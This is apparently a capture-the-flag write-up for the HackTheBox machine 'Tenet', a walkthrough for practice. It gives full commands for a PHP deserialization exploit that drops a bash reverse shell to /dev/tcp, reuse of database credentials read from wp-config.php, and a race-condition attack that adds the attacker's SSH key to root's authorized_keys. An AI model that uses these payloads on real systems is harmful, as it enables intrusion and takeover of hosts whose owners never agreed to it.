Post

HTB Tenet Writeup

INFO

Machine IP = 10.10.10.223
OS = Linux
Level = MEDIUM
Points = 30

Write the IP of the machine to your /etc/hosts file

1
echo "10.10.10.223 tenet.htb" >> /etc/hosts

Scanning

1
nmap -sC -sV 10.10.10.223

Enumeration

1
Port 80 – WordPress Blog

Create a directory tenet and cd tenet/ then let’s do Gobuster

1
gobuster dir -u http://10.10.10.223 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log
  1. -x –extensions string File extension(s) to search for
  2. -t –threads int Number of concurrent threads (default 10)

We notice in the /Wordpress page there is a post called Migration with a comment by the user neil:

1
2
did you remove the sator php file and the backup?? the migration program is incomplete! 
why would you do this?!

It’s seems like there is a backup site called sator.php. Adding sator.tenet.htb to our /etc/hosts file, and navigating to the URL

1
http://10.10.10.223/sator.php

we see this:

1
2
[+] Grabbing users from text file
[] Database updated

So, the php file is there and it’s getting executed. Since there was a mention of a backup file by the use neil, lets try to download that file:

1
wget http://sator.tenet.htb/sator.php.bak

After download sator.php.bak rename it to sator.php

Let’s check the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# sator.php
<?php

class DatabaseExport
{
        public $user_file = 'users.txt';
        public $data = '';

        public function update_db()
        {
                echo '[+] Grabbing users from text file <br>';
                $this-> data = 'Success';
        }


        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file,
$this->data);
                echo '[] Database updated <br>';
        //      echo 'Gotta get this working properly...';
        }
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app -> update_db();


?>

We see that the script looks for a GET input variable arepo and unserializes it. To exploit this, lets look at Exploiting PHP Deserialization.

To write the exploit, lets do the following:

  1. Write the class DatabaseExport on our local machine, define the user_file to be a php file and the data to be a php reverse shell to our local machine.
  2. Serialize it and urlencode it to pass to the GET variable.

Now, open a php interactive cli using:

1
php -a 

Write the following:

1
2
3
4
5
6
class DatabaseExport {
  public $user_file = 'exploit.php';
  public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/<Your IP address>/<Port for revers connection> 0>&1\'"); ?>';
  }

print urlencode(serialize(new DatabaseExport));

The payload is generated. Copy the URL encoded output and make the request using curl:

1
curl -i http://sator.tenet.htb/sator.php?arepo=<Add URL encoded output here>

Open a nc listener on port that you added on payload and get a reverse shell by browsing to:

1
10.10.10.223/exploit.php
1
nc -nvlp <Your Port>

Now we have a reverse shell

Privilege Escalation

Checking in the /wordpress directory, we find credentials: now do cat wp-config.php then we get this DB configration

1
2
define( 'DB_USER', 'neil' );
define( 'DB_PASSWORD', 'Opera2112' );

Do ssh into the
user: neil
password: Opera2112

Getting Root

Check our privileges as the user neil:

1
neil@tenet:/$ sudo -l

User neil may run the following commands on tenet:

1
(ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh

Checking this file /usr/local/bin/enableSSH.sh, we see the following function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
addKey() {

        tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)

        (umask 110; touch $tmpName)

        /bin/echo $key >>$tmpName

        checkFile $tmpName

        /bin/cat $tmpName >>/root/.ssh/authorized_keys

        /bin/rm $tmpName

}

The script:

  1. Generates and writes a SSH public key (id_rsa.pub) to the file /tmp/ssh-XXXXXXXX
  2. Copies the contents of this folder to root/.ssh/authorized_keys
  3. Deletes the tmp file. Lets do the 3 steps to exploit this

Step 1

First create an id_rsa on your local machine using ssh-keygen
Run the following script as neil:

1
neil@tenet:/$ while true; do echo "YOUR id_rsa.pub key" | tee /tmp/ssh-*;

Done
This is going to continuously write your public key to the tmp folder

Step 2

Run the enableSSH.sh script many times until we get a successful message:

1
2
3
4
5
6
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!

Step 3

On your local host

1
kali@kali:~/.ssh$ chmod 600 id_rsa

Then ssh into the tenet box as root:

1
kali@kali:~/.ssh$ ssh -i id_rsa [email protected]

Done!


Hi there 👋 Support me!

Life is an echo—what you send out comes back.

Donate

This post is licensed under CC BY 4.0 by the author.